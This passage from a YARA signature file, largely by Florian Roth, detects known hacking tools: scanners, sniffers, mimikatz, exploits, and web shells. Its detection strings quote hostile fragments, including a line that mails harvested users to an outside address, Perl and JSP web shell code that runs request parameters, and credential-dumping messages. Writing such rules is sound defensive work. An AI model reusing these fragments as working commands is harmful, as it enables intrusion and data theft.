   		description = "Linux hack tools - file pscan2.c"   
   		author = "Florian Roth"   
   		reference = "not set"   
   		date = "2015/01/19"   
   		hash = "eb024dfb441471af7520215807c34d105efa5fd8"   
   	strings:   
   		$s0 = "snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);" fullword ascii   
   		$s2 = "printf(\"Usage: %s <b-block> <port> [c-block]\\n\", argv[0]);" fullword ascii   
   		$s3 = "printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - sca" ascii   
   		$s19 = "connlist[i].addr.sin_family = AF_INET;" fullword ascii   
   		$s20 = "snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\"," fullword ascii   
   	condition:   
   		2 of them   
rule CN_Tools_xsniff {   
   	meta:   
   		description = "Chinese Hacktool Set - file xsniff.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "d61d7329ac74f66245a92c4505a327c85875c577"   
   	strings:   
   		$s0 = "xsiff.exe -pass -hide -log pass.log" fullword ascii   
   		$s1 = "HOST: %s USER: %s, PASS: %s" fullword ascii   
   		$s2 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii   
   		$s10 = "Code by glacier <glacier@xfocus.org>" fullword ascii   
   		$s11 = "%-5s%s->%s Bytes=%d TTL=%d Type: %d,%d ID=%d SEQ=%d" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 220KB and 2 of them   
rule BypassUac2 {   
   	meta:   
   		description = "Auto-generated rule - file BypassUac2.zip"   
   		author = "yarGen Yara Rule Generator"   
   		hash = "ef3e7dd2d1384ecec1a37254303959a43695df61"   
   	strings:   
   		$s0 = "/BypassUac/BypassUac/BypassUac_Utils.cpp" fullword ascii   
   		$s1 = "/BypassUac/BypassUacDll/BypassUacDll.aps" fullword ascii   
   		$s3 = "/BypassUac/BypassUac/BypassUac.ico" fullword ascii   
   	condition:   
   		all of them   
rule sig_238_token {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file token.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "c52bc6543d4281aa75a3e6e2da33cfb4b7c34b14"   
   	strings:   
   		$s0 = "Logon.exe" fullword ascii   
   		$s1 = "Domain And User:" fullword ascii   
   		$s2 = "PID=Get Addr$(): One" fullword ascii   
   		$s3 = "Process " fullword ascii   
   		$s4 = "psapi.dllK" fullword ascii   
   	condition:   
   		all of them   
rule GoodToolset_ms11080 {   
   	meta:   
   		description = "Chinese Hacktool Set - file ms11080.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "f0854c49eddf807f3a7381d3b20f9af4a3024e9f"   
   	strings:   
   		$s1 = "[*] command add user 90sec 90sec" fullword ascii   
   		$s2 = "\\ms11080\\Debug\\ms11080.pdb" fullword ascii   
   		$s3 = "[>] by:Mer4en7y@90sec.org" fullword ascii   
   		$s4 = "[*] Add to Administrators success" fullword ascii   
   		$s5 = "[*] User has been successfully added" fullword ascii   
   		$s6 = "[>] ms11-08 Exploit" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 240KB and 2 of them   
rule ms11080_withcmd {   
   	meta:   
   		description = "Chinese Hacktool Set - file ms11080_withcmd.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "745e5058acff27b09cfd6169caf6e45097881a49"   
   	strings:   
   		$s1 = "Usage : ms11-080.exe cmd.exe Command " fullword ascii   
   		$s2 = "\\ms11080\\ms11080\\Debug\\ms11080.pdb" fullword ascii   
   		$s3 = "[>] by:Mer4en7y@90sec.org" fullword ascii   
   		$s4 = "[>] create porcess error" fullword ascii   
   		$s5 = "[>] ms11-080 Exploit" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 300KB and 1 of them   
rule PortRacer {   
   	meta:   
   		description = "Auto-generated rule on file PortRacer.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "2834a872a0a8da5b1be5db65dfdef388"   
   	strings:   
   		$s0 = "Auto Scroll BOTH Text Boxes"   
   		$s4 = "Start/Stop Portscanning"   
   		$s6 = "Auto Save LogFile by pressing STOP"   
   	condition:   
   		all of them   
rule gina_zip_Folder_gina {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file gina.dll"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "e0429e1b59989cbab6646ba905ac312710f5ed30"   
   	strings:   
   		$s0 = "NEWGINA.dll" fullword ascii   
   		$s1 = "LOADER ERROR" fullword ascii   
   		$s3 = "WlxActivateUserShell" fullword ascii   
   		$s6 = "WlxWkstaLockedSAS" fullword ascii   
   		$s13 = "WlxIsLockOk" fullword ascii   
   		$s14 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii   
   		$s16 = "WlxShutdown" fullword ascii   
   		$s17 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii   
   	condition:   
   		all of them   
rule InstGina {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file InstGina.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "5317fbc39508708534246ef4241e78da41a4f31c"   
   	strings:   
   		$s0 = "To Open Registry" fullword ascii   
   		$s4 = "I love Candy very much!!" ascii   
   		$s5 = "GinaDLL" fullword ascii   
   	condition:   
   		all of them   
rule update_PcMain {   
   	meta:   
   		description = "Chinese Hacktool Set - file PcMain.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "aa68323aaec0269b0f7e697e69cce4d00a949caa"   
   	strings:   
   		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322" ascii   
   		$s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" fullword ascii   
   		$s2 = "SOFTWARE\\Classes\\HTTP\\shell\\open\\command" fullword ascii   
   		$s3 = "\\svchost.exe -k " fullword ascii   
   		$s4 = "SYSTEM\\ControlSet001\\Services\\%s" fullword ascii   
   		$s9 = "Global\\%s-key-event" fullword ascii   
   		$s10 = "%d%d.exe" fullword ascii   
   		$s14 = "%d.exe" fullword ascii   
   		$s15 = "Global\\%s-key-metux" fullword ascii   
   		$s18 = "GET / HTTP/1.1" fullword ascii   
   		$s19 = "\\Services\\" fullword ascii   
   		$s20 = "qy001id=%d;qy001guid=%s" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 500KB and 4 of them   
rule iam_alt_iam_alt : Toolkit  {   
   	meta:   
   		description = "Auto-generated rule - file iam-alt.exe"   
   		author = "Florian Roth"   
   		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"   
   		date = "2015-07-10"   
   		score = 80   
   		hash = "2ea662ef58142d9e340553ce50d95c1b7a405672acdfd476403a565bdd0cfb90"   
   	strings:   
   		$s0 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii /* PEStudio Blacklist: strings */ /* score: '59.00' */   
   		$s1 = "IAM-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii /* PEStudio Blacklist: strings */ /* score: '43.00' */   
   		$s2 = "This tool allows you to change the NTLM credentials of the current logon session" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.00' */   
   		$s3 = "username:domainname:lmhash:nthash" fullword ascii /* PEStudio Blacklist: strings */ /* score: '15.00' */   
   		$s4 = "Error in cmdline!. Bye!." fullword ascii /* score: '12.00' */   
   		$s5 = "Error: Cannot open LSASS.EXE!." fullword ascii /* score: '12.00' */   
   		$s6 = "nthash is too long!." fullword ascii /* score: '8.00' */   
   		$s7 = "LSASS HANDLE: %x" fullword ascii /* score: '5.00' */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 240KB and 2 of them   
rule perlcmd_zip_Folder_cmd {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file cmd.cgi"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "21b5dc36e72be5aca5969e221abfbbdd54053dd8"   
   	strings:   
   		$s0 = "syswrite(STDOUT, \"Content-type: text/html\\r\\n\\r\\n\", 27);" fullword ascii   
   		$s1 = "s/%20/ /ig;" fullword ascii   
   		$s2 = "syswrite(STDOUT, \"\\r\\n</PRE></HTML>\\r\\n\", 17);" fullword ascii   
   		$s4 = "open(STDERR, \">&STDOUT\") || die \"Can't redirect STDERR\";" fullword ascii   
   		$s5 = "$_ = $ENV{QUERY_STRING};" fullword ascii   
   		$s6 = "$execthis = $_;" fullword ascii   
   		$s7 = "system($execthis);" fullword ascii   
   		$s12 = "s/%2f/\\//ig;" fullword ascii   
   	condition:   
   		6 of them   
rule SQLMap   
   {   
   	meta:   
   		author = "Florian Roth"   
   		description = "This signature detects the SQLMap SQL injection tool"   
   		date = "07/2014"   
   		score = 60   
   	strings:   
   		$s1 = "except SqlmapBaseException, ex:"   
   	condition:   
   		1 of them   
rule Dos_1 {   
   	meta:   
   		description = "Chinese Hacktool Set - file 1.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "b554f0687a12ec3a137f321cc15e052ff219f28c"   
   	strings:   
   		$s1 = "/churrasco/-->Usage: Churrasco.exe \"command to run\"" fullword ascii   
   		$s2 = "/churrasco/-->Done, command should have ran as SYSTEM!" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 1000KB and all of them   
rule CN_Hacktool_MilkT_BAT {   
   	meta:   
   		description = "Detects a chinese Portscanner named MilkT - shipped BAT"   
   		author = "Florian Roth"   
   		score = 70   
   		date = "12.10.2014"   
   	strings:   
   		$s0 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii   
   		$s1 = "if not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%" ascii   
   	condition:   
   		all of them   
rule CookieTools2 {   
   	meta:   
   		description = "Chinese Hacktool Set - file CookieTools2.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "cb67797f229fdb92360319e01277e1345305eb82"   
   	strings:   
   		$s1 = "www.gxgl.com&www.gxgl.net" fullword wide   
   		$s2 = "ip.asp?IP=" fullword ascii   
   		$s3 = "MSIE 5.5;" fullword ascii   
   		$s4 = "SOFTWARE\\Borland\\" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 700KB and all of them   
rule Angry_IP_Scanner_v2_08_ipscan {   
   	meta:   
   		description = "Auto-generated rule on file ipscan.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "70cf2c09776a29c3e837cb79d291514a"   
   	strings:   
   		$s0 = "_H/EnumDisplay/"   
   		$s5 = "ECTED.MSVCRT0x"   
   		$s8 = "NotSupported7"   
   	condition:   
   		all of them   
rule wineggdrop : portscanner toolkit   
   {   
       meta:   
           author = "Christian Rebischke (@sh1bumi)"   
           date = "2015-09-05"   
           description = "Rules for TCP Portscanner VX.X by WinEggDrop"   
           in_the_wild = true   
           family = "Hackingtool/Portscanner"   
      
       strings:   
           $a = { 54 43 50 20 50 6f 72 74 20 53 63 61 6e 6e 65 72    
                  20 56 3? 2e 3? 20 42 79 20 57 69 6e 45 67 67 44    
                  72 6f 70 0a }    
           $b = "Result.txt"   
           $c = "Usage:   %s TCP/SYN StartIP [EndIP] Ports [Threads] [/T(N)] [/(H)Banner] [/Save]\n"   
      
       condition:   
           //check for MZ Signature at offset 0   
           uint16(0) == 0x5A4D   
      
           and   
      
           //check for wineggdrop specific strings   
           $a and $b and $c    
rule lamescan3 {   
   	meta:   
   		description = "Chinese Hacktool Set - file lamescan3.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "3130eefb79650dab2e323328b905e4d5d3a1d2f0"   
   	strings:   
   		$s1 = "dic\\loginlist.txt" fullword ascii   
   		$s2 = "Radmin.exe" fullword ascii   
   		$s3 = "lamescan3.pdf!" fullword ascii   
   		$s4 = "dic\\passlist.txt" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 3740KB and all of them   
rule ProPort_zip_Folder_ProPort {   
   	meta:   
   		description = "Auto-generated rule on file ProPort.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "c1937a86939d4d12d10fc44b7ab9ab27"   
   	strings:   
   		$s0 = "Corrupt Data!"   
   		$s1 = "K4p~omkIz"   
   		$s2 = "DllTrojanScan"   
   		$s3 = "GetDllInfo"   
   		$s4 = "Compressed by Petite (c)1999 Ian Luck."   
   		$s5 = "GetFileCRC32"   
   		$s6 = "GetTrojanNumber"   
   		$s7 = "TFAKAbout"   
   	condition:   
   		all of them   
rule sig_238_cmd_2 {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file cmd.jsp"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "be4073188879dacc6665b6532b03db9f87cfc2bb"   
   	strings:   
   		$s0 = "Process child = Runtime.getRuntime().exec(" ascii   
   		$s1 = "InputStream in = child.getInputStream();" fullword ascii   
   		$s2 = "String cmd = request.getParameter(\"" ascii   
   		$s3 = "while ((c = in.read()) != -1) {" fullword ascii   
   		$s4 = "<%@ page import=\"java.io.*\" %>" fullword ascii   
   	condition:   
   		all of them   
rule crack_Loader {   
   	meta:   
   		description = "Auto-generated rule on file Loader.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "f4f79358a6c600c1f0ba1f7e4879a16d"   
   	strings:   
   		$s0 = "NeoWait.exe"   
   		$s1 = "RRRRRRRW"   
   	condition:   
   		all of them   
rule dat_report {   
   	meta:   
   		description = "Chinese Hacktool Set - file report.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "4582a7c1d499bb96dad8e9b227e9d5de9becdfc2"   
   	strings:   
   		$s1 = "<a href=\"http://www.xfocus.net\">X-Scan</a>" fullword ascii   
   		$s2 = "REPORT-ANALYSIS-OF-HOST" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 480KB and all of them   
rule superscan3_0 {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file superscan3.0.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "a9a02a14ea4e78af30b8b4a7e1c6ed500a36bc4d"   
   	strings:   
   		$s0 = "\\scanner.ini" fullword ascii   
   		$s1 = "\\scanner.exe" fullword ascii   
   		$s2 = "\\scanner.lst" fullword ascii   
   		$s4 = "\\hensss.lst" fullword ascii   
   		$s5 = "STUB32.EXE" fullword wide   
   		$s6 = "STUB.EXE" fullword wide   
   		$s8 = "\\ws2check.exe" fullword ascii   
   		$s9 = "\\trojans.lst" fullword ascii   
   		$s10 = "1996 InstallShield Software Corporation" fullword wide   
   	condition:   
   		all of them   
rule sekurlsa {   
   	meta:   
   		description = "Chinese Hacktool Set - file sekurlsa.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"   
   	strings:   
   		$s1 = "Bienvenue dans un processus distant" fullword wide   
   		$s2 = "Format d'appel invalide : addLogonSession [idSecAppHigh] idSecAppLow Utilisateur" wide   
   		$s3 = "SECURITY\\Policy\\Secrets" fullword wide   
   		$s4 = "Injection de donn" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 1150KB and all of them   
rule scanarator_iis {   
   	meta:   
   		description = "Auto-generated rule on file iis.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "3a8fc02c62c8dd65e038cc03e5451b6e"   
   	strings:   
   		$s0 = "example: iis 10.10.10.10"   
   		$s1 = "send error"   
   	condition:   
   		all of them   
rule Dos_iis {   
   	meta:   
   		description = "Chinese Hacktool Set - file iis.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "61ffd2cbec5462766c6f1c44bd44eeaed4f3d2c7"   
   	strings:   
   		$s1 = "comspec" fullword ascii   
   		$s2 = "program terming" fullword ascii   
   		$s3 = "WinSta0\\Defau" fullword ascii   
   		$s4 = "* FROM IIsWebInfo" ascii   
   		$s5 = "www.icehack." ascii   
   		$s6 = "wmiprvse.exe" fullword ascii   
   		$s7 = "Pid: %d" ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 70KB and all of them   
rule mimikatz_lsass_mdmp   
   {   
   	meta:   
   		description		= "LSASS minidump file for mimikatz"   
   		author			= "Benjamin DELPY (gentilkiwi)"   
      
   	strings:   
   		$lsass			= "System32\\lsass.exe"	wide nocase   
      
   	condition:   
   		(uint32(0) == 0x504d444d) and $lsass   
rule UnPack_rar_Folder_TBack {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file TBack.DLL"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "30fc9b00c093cec54fcbd753f96d0ca9e1b2660f"   
   	strings:   
   		$s0 = "Redirect SPort RemoteHost RPort       -->Port Redirector" fullword ascii   
   		$s1 = "http://IP/a.exe a.exe                 -->Download A File" fullword ascii   
   		$s2 = "StopSniffer                           -->Stop Pass Sniffer" fullword ascii   
   		$s3 = "TerminalPort Port                     -->Set New Terminal Port" fullword ascii   
   		$s4 = "Example: Http://12.12.12.12/a.exe abc.exe" fullword ascii   
   		$s6 = "Create Password Sniffering Thread Successfully. Status:Logging" fullword ascii   
   		$s7 = "StartSniffer NIC                      -->Start Sniffer" fullword ascii   
   		$s8 = "Shell                                 -->Get A Shell" fullword ascii   
   		$s11 = "DeleteService ServiceName             -->Delete A Service" fullword ascii   
   		$s12 = "Disconnect ThreadNumber|All           -->Disconnect Others" fullword ascii   
   		$s13 = "Online                                -->List All Connected IP" fullword ascii   
   		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword ascii   
   		$s16 = "Example: Set REG_SZ Test Trojan.exe" fullword ascii   
   		$s18 = "Execute Program                       -->Execute A Program" fullword ascii   
   		$s19 = "Reboot                                -->Reboot The System" fullword ascii   
   		$s20 = "Password Sniffering Is Not Running" fullword ascii   
   	condition:   
   		4 of them   
rule LinuxHacktool_eyes_mass {   
   	meta:   
   		description = "Linux hack tools - file mass"   
   		author = "Florian Roth"   
   		reference = "not set"   
   		date = "2015/01/19"   
   		hash = "2054cb427daaca9e267b252307dad03830475f15"   
   	strings:   
   		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii   
   		$s1 = "echo -e \"${BLU}Private Scanner By Raphaello , DeMMoNN , tzepelush & DraC\\n\\r" ascii   
   		$s3 = "killall -9 pscan2" fullword ascii   
   		$s5 = "echo \"[*] ${DCYN}Gata esti h4x0r ;-)${RES}  [*]\"" fullword ascii   
   		$s6 = "echo -e \"${DCYN}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${RES}\"" fullword ascii   
   	condition:   
   		1 of them   
rule SplitJoin_V1_3_3_rar_Folder_3 {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "21409117b536664a913dcd159d6f4d8758f43435"   
   	strings:   
   		$s2 = "ie686@sohu.com" fullword ascii   
   		$s3 = "splitjoin.exe" fullword ascii   
   		$s7 = "SplitJoin" fullword ascii   
   	condition:   
   		all of them   
rule sig_238_xsniff {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file xsniff.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "d61d7329ac74f66245a92c4505a327c85875c577"   
   	strings:   
   		$s2 = "xsiff.exe -pass -hide -log pass.log" fullword ascii   
   		$s3 = "%s - simple sniffer for win2000" fullword ascii   
   		$s4 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii   
   		$s5 = "HOST: %s USER: %s, PASS: %s" fullword ascii   
   		$s7 = "http://www.xfocus.org" fullword ascii   
   		$s9 = "  -pass        : Filter username/password" fullword ascii   
   		$s18 = "  -udp         : Output udp packets" fullword ascii   
   		$s19 = "Code by glacier <glacier@xfocus.org>" fullword ascii   
   		$s20 = "  -tcp         : Output tcp packets" fullword ascii   
   	condition:   
   		6 of them   
rule Ncrack   
   {   
   	meta:   
   		author = "Florian Roth"   
   		description = "This signature detects the Ncrack brute force tool"   
   		date = "07/2014"   
   		score = 60   
   	strings:   
   		$s1 = "NcrackOutputTable only supports adding up to 4096 to a cell via"   
   	condition:   
   		1 of them   
rule mimikatz   
   {   
   	meta:   
   		description		= "mimikatz"   
   		author			= "Benjamin DELPY (gentilkiwi)"   
   		tool_author		= "Benjamin DELPY (gentilkiwi)"   
         score          = 80   
   	strings:   
   		$exe_x86_1		= { 89 71 04 89 [0-3] 30 8d 04 bd }   
   		$exe_x86_2		= { 89 79 04 89 [0-3] 38 8d 04 b5 }   
      
   		$exe_x64_1		= { 4c 03 d8 49 [0-3] 8b 03 48 89 }   
   		$exe_x64_2		= { 4c 8b df 49 [0-3] c1 e3 04 48 [0-3] 8b cb 4c 03 [0-3] d8 }   
      
   		$dll_1			= { c7 0? 00 00 01 00 [4-14] c7 0? 01 00 00 00 }   
   		$dll_2			= { c7 0? 10 02 00 00 ?? 89 4? }   
      
   		$sys_x86		= { a0 00 00 00 24 02 00 00 40 00 00 00 [0-4] b8 00 00 00 6c 02 00 00 40 00 00 00 }   
   		$sys_x64		= { 88 01 00 00 3c 04 00 00 40 00 00 00 [0-4] e8 02 00 00 f8 02 00 00 40 00 00 00 }   
      
   	condition:   
   		(all of ($exe_x86_*)) or (all of ($exe_x64_*)) or (all of ($dll_*)) or (any of ($sys_*))   
rule Fierce2   
   {   
   	meta:   
   		author = "Florian Roth"   
   		description = "This signature detects the Fierce2 domain scanner"   
   		date = "07/2014"   
   		score = 60   
   	strings:   
   		$s1 = "$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,"   
   	condition:   
   		1 of them   
rule APT_Proxy_Malware_Packed_dev   
   {   
   	meta:   
   		author = "FRoth"   
   		date = "2014-11-10"   
   		description = "APT Malware - Proxy"   
   		hash = "6b6a86ceeab64a6cb273debfa82aec58"   
   		score = 50   
   	strings:   
   		$string0 = "PECompact2" fullword   
   		$string1 = "[LordPE]"   
   		$string2 = "steam_ker.dll"   
   	condition:   
   		all of them   
rule cndcom_cndcom {   
   	meta:   
   		description = "Chinese Hacktool Set - file cndcom.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "08bbe6312342b28b43201125bd8c518531de8082"   
   	strings:   
   		$s1 = "- Rewritten by HDM last <hdm [at] metasploit.com>" fullword ascii   
   		$s2 = "- Usage: %s <Target ID> <Target IP>" fullword ascii   
   		$s3 = "- Remote DCOM RPC Buffer Overflow Exploit" fullword ascii   
   		$s4 = "- Warning:This Code is more like a dos tool!(Modify by pingker)" fullword ascii   
   		$s5 = "Windows NT SP6 (Chinese)" fullword ascii   
   		$s6 = "- Original code by FlashSky and Benjurry" fullword ascii   
   		$s7 = "\\C$\\123456111111111111111.doc" fullword wide   
   		$s8 = "shell3all.c" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 100KB and 2 of them   
rule LinuxHacktool_eyes_a {   
   	meta:   
   		description = "Linux hack tools - file a"   
   		author = "Florian Roth"   
   		reference = "not set"   
   		date = "2015/01/19"   
   		hash = "458ada1e37b90569b0b36afebba5ade337ea8695"   
   	strings:   
   		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii   
   		$s1 = "mv scan.log bios.txt" fullword ascii   
   		$s2 = "rm -rf bios.txt" fullword ascii   
   		$s3 = "echo -e \"# by Eyes.\"" fullword ascii   
   		$s4 = "././pscan2 $1 22" fullword ascii   
   		$s10 = "echo \"#cautam...\"" fullword ascii   
   	condition:   
   		2 of them   
rule sig_238_hunt {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file hunt.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "f9f059380d95c7f8d26152b1cb361d93492077ca"   
   	strings:   
   		$s1 = "Programming by JD Glaser - All Rights Reserved" fullword ascii   
   		$s3 = "Usage - hunt \\\\servername" fullword ascii   
   		$s4 = ".share = %S - %S" fullword wide   
   		$s5 = "SMB share enumerator and admin finder " fullword ascii   
   		$s7 = "Hunt only runs on Windows NT..." fullword ascii   
   		$s8 = "User = %S" fullword ascii   
   		$s9 = "Admin is %s\\%s" fullword ascii   
   	condition:   
   		all of them   
rule Dos_Down32 {   
   	meta:   
   		description = "Chinese Hacktool Set - file Down32.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "0365738acd728021b0ea2967c867f1014fd7dd75"   
   	strings:   
   		$s2 = "C:\\Windows\\Temp\\Cmd.txt" fullword wide   
   		$s6 = "down.exe" fullword wide   
   		$s15 = "get_Form1" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 137KB and all of them   
rule PassSniffer_zip_Folder_readme {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file readme.txt"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "a52545ae62ddb0ea52905cbb61d895a51bfe9bcd"   
   	strings:   
   		$s0 = "PassSniffer.exe" fullword ascii   
   		$s1 = "POP3/FTP Sniffer" fullword ascii   
   		$s2 = "Password Sniffer V1.0" fullword ascii   
   	condition:   
   		1 of them   
rule HackTool_Samples {   
   	meta:   
   		description = "Hacktool"   
   		score = 50   
   	strings:   
   		$a = "Unable to uninstall the fgexec service"   
   		$b = "Unable to set socket to sniff"   
   		$c = "Failed to load SAM functions"   
   		$d = "Dump system passwords"   
   		$e = "Error opening sam hive or not valid file"   
   		$f = "Couldn't find LSASS pid"   
   		$g = "samdump.dll"   
   		$h = "WPEPRO SEND PACKET"   
   		$i = "WPE-C1467211-7C89-49c5-801A-1D048E4014C4"   
   		$j = "Usage: unshadow PASSWORD-FILE SHADOW-FILE"   
   		$k = "arpspoof\\Debug"   
   		$l = "Success: The log has been cleared"   
   		$m = "clearlogs [\\\\computername"   
   		$n = "DumpUsers 1."   
   		$o = "dictionary attack with specified dictionary file"   
   		$p = "by Objectif Securite"   
   		$q = "objectif-securite"   
   		$r = "Cannot query LSA Secret on remote host"   
   		$s = "Cannot write to process memory on remote host"   
   		$t = "Cannot start PWDumpX service on host"   
   		$u = "usage: %s <system hive> <security hive>"   
   		$v = "username:domainname:LMhash:NThash"   
   		$w = "<server_name_or_ip> | -f <server_list_file> [username] [password]"   
   		$x = "Impersonation Tokens Available"   
   		$y = "failed to parse pwdump format string"   
   		$z = "Dumping password"   
   	condition:   
   		1 of them   
rule Ncat_Hacktools_CN {   
   	meta:   
   		description = "Disclosed hacktool set - file nc.exe"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "001c0c01c96fa56216159f83f6f298755366e528"   
   	strings:   
   		$s0 = "nc -l -p port [options] [hostname] [port]" fullword ascii   
   		$s2 = "nc [-options] hostname port[s] [ports] ... " fullword ascii   
   		$s3 = "gethostpoop fuxored" fullword ascii   
   		$s6 = "VERNOTSUPPORTED" fullword ascii   
   		$s7 = "%s [%s] %d (%s)" fullword ascii   
   		$s12 = " `--%s' doesn't allow an argument" fullword ascii   
   	condition:   
   		all of them   
rule DK_Brute {   
   	meta:   
   		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file DK Brute.exe"   
   		author = "Florian Roth"   
   		date = "22.11.14"   
   		score = 70   
   		reference = "http://goo.gl/xiIphp"   
   		hash = "93b7c3a01c41baecfbe42461cb455265f33fbc3d"   
   	strings:   
   		$s6 = "get_CrackedCredentials" fullword ascii   
   		$s13 = "Same port used for two different protocols:" fullword wide   
   		$s18 = "coded by fLaSh" fullword ascii   
   		$s19 = "get_grbToolsScaningCracking" fullword ascii   
   	condition:   
   		all of them   
rule mysql_pwd_crack {   
   	meta:   
   		description = "Chinese Hacktool Set - file mysql_pwd_crack.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "57d1cb4d404688804a8c3755b464a6e6248d1c73"   
   	strings:   
   		$s1 = "mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txt" fullword ascii   
   		$s2 = "Successfully --> username %s password %s " fullword ascii   
   		$s3 = "zhouzhen@gmail.com http://zhouzhen.eviloctal.org" fullword ascii   
   		$s4 = "-a automode  automatic crack the mysql password " fullword ascii   
   		$s5 = "mysql_pwd_crack 127.0.0.1 -x 3306 -a" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 100KB and 1 of them   
rule iam_iam : Toolkit  {   
   	meta:   
   		description = "Auto-generated rule - file iam.exe"   
   		author = "Florian Roth"   
   		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"   
   		date = "2015-07-10"   
   		score = 80   
   		hash = "8a8fcce649259f1b670bb1d996f0d06f6649baa8eed60db79b2c16ad22d14231"   
   	strings:   
